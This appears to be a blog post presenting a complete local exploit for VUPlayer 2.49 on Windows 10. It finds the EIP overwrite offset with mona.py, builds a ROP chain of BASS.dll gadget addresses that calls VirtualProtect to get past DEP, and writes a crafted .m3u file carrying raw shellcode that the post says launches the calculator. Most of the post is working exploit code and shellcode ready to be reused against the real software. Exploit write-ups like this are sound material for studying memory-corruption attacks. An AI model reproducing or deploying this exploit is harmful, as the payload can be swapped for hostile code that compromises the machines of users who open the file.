System Hacking / Windows Pwnable

VUPlayer 2.49 Exploit (Local)

ii4gsp 2021. 1. 4. 00:47
Test Environment: Windows 10 x64
Test Program: VUPlayer 2.49 x86
Language used: Python 2.7
Debugger: Immunity Debugger
Module used: mona.py
Mitigation: DEP, ASLR


Use the !mona pc 1500 command to generate a 1500-byte string built from a cyclic pattern (every 4-byte fragment of it is unique, which is what makes the offset lookup below possible).

The generated pattern file is saved in mona's logs folder.

EIP was overwritten with 0x68423768 and the program crashed.

Use the !mona po 68423768 command to find where that fragment sits in the pattern.

The offset is 1012 bytes.
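As an added example (not the post's own script, and written for Python 3 rather than the Python 2.7 used here), this is what !mona pc and !mona po do under the hood: build the Metasploit-style cyclic pattern and search it for the register value from the crash. The function names are my own; the value 0x68423768 is the EIP recorded above.

```python
import struct

def cyclic_pattern(length):
    """Cyclic pattern 'Aa0Aa1Aa2...' cut to `length` bytes (same scheme as !mona pc).
    Every 4-byte window is unique within the first 20280 bytes, so a register
    value taken from a crash maps back to exactly one offset."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern longer than 20280 bytes repeats; use a wider alphabet")
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(pattern, reg_value):
    """Offset of the 4 pattern bytes that landed in the register (same as !mona po).
    x86 is little-endian, so EIP = 0x68423768 means the bytes b'h7Bh' were popped.
    Returns None when the value did not come from the pattern (e.g. a crash that
    corrupted EIP with something else, so the overwrite is not directly controlled)."""
    needle = struct.pack("<I", reg_value)
    idx = pattern.find(needle)
    return idx if idx != -1 else None

if __name__ == "__main__":
    pat = cyclic_pattern(1500)                 # equivalent of: !mona pc 1500
    print(pattern_offset(pat, 0x68423768))     # equivalent of: !mona po 68423768
```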


payload = ''
payload += 'A' * 1012   # filler up to the saved return address
payload += 'B' * 4      # lands in EIP as 0x42424242

f = open('test.m3u', 'wb')   # binary mode so no bytes get translated
f.write(payload)
f.close()

Use the offset just found to check whether EIP can be set to a value of our choosing.

If the offset is correct, EIP will be overwritten with the four 'B' bytes.

EIP was overwritten with 0x42424242, as intended.

Use the !mona modules command to list the loaded modules and their protections.

Since DEP is enabled, the return address cannot simply point at code on the stack; instead, build a ROP chain from gadgets in a module that has no protections enabled (in particular no ASLR, so its addresses are stable).

I will use the BASS.dll module.


command: !mona rop -n [module name]

Use the mona rop command to collect the gadgets from that module and generate the chain.

import struct

def create_rop_chain():
    # Chain generated by mona from BASS.dll: it loads the address of
    # VirtualProtect() through the IAT, places its arguments in registers,
    # and uses PUSHAD # RETN to call it so the stack becomes executable
    # (new protection 0x40 over 0x201 bytes), then returns into JMP ESP.
    rop_gadgets = [
      0x10015fe7,  # POP EAX # RETN [BASS.dll]
      0x10040284,  # ptr to &VirtualProtect() [IAT BASS.dll]
      0x1001eaf1,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll]
      0x10030950,  # XCHG EAX,ESI # RETN [BASS.dll]
      0x1001d748,  # POP EBP # RETN [BASS.dll]
      0x100222c5,  # & jmp esp [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll]
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10032f32,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
      0x10015f82,  # POP EAX # RETN [BASS.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll]
      0x10038a6c,  # XCHG EAX,EDX # RETN [BASS.dll]
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll]
      0x10108429,  # &Writable location [BASSWMA.dll]
      0x10016218,  # POP EDI # RETN [BASS.dll]
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll]
      0x90909090,  # nop
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll]
    ]

    # pack each gadget as a 32-bit little-endian value
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

# shellcode; when it runs, the calculator appears (see the result below)
shellcode = (
    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
    "\x1c\x39\xbd"
)

rop_chain = create_rop_chain()

payload = ""
payload += "A" * 1012       # filler up to the saved return address
payload += rop_chain        # first gadget lands in EIP
payload += "\x90" * 100     # nop sled, reached via JMP ESP
payload += shellcode

f = open("exploit.m3u", "wb")   # binary mode so no bytes get translated
f.write(payload)
f.close()

The completed exploit code is shown above.

If exploitation succeeds, the shellcode runs and the calculator pops up.